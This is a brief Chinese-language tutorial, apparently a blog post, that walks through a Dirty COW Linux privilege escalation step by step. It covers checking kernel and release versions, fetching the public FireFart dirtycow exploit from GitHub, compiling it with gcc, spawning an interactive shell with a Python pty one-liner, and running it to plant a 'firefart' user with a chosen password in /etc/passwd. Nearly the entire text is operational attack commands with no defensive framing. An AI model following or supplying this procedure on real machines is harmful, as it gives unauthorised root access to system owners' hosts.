- 漏洞范围:
Linux kernel >= 2.6.22(2007年发行,到2016年10月18日才修复) - 查看版本信息
uname -a
uname -r
cat /etc/issue
cat /etc/*-release
1.jpg
- 在脏牛的影响范围内,直接上传脚本
https://github.com/FireFart/dirtycow
- 给脚本执行权限
chmod 777 dirty.c
- 编译脚本
#利用gcc编译dirty.c文件
gcc -pthread dirty.c -o dirty -lcrypt
2.jpg
- 切换交互式shell
python -c 'import pty;pty.spawn("/bin/sh")'
- 执行脚本
./dirty 123456 //(密码)
3.jpg
4.jpg
- /etc/passwd 文件已经更改
firefart:123456 //用户名:密码
//利用之前最后做个备份 /etc/passwd
网友评论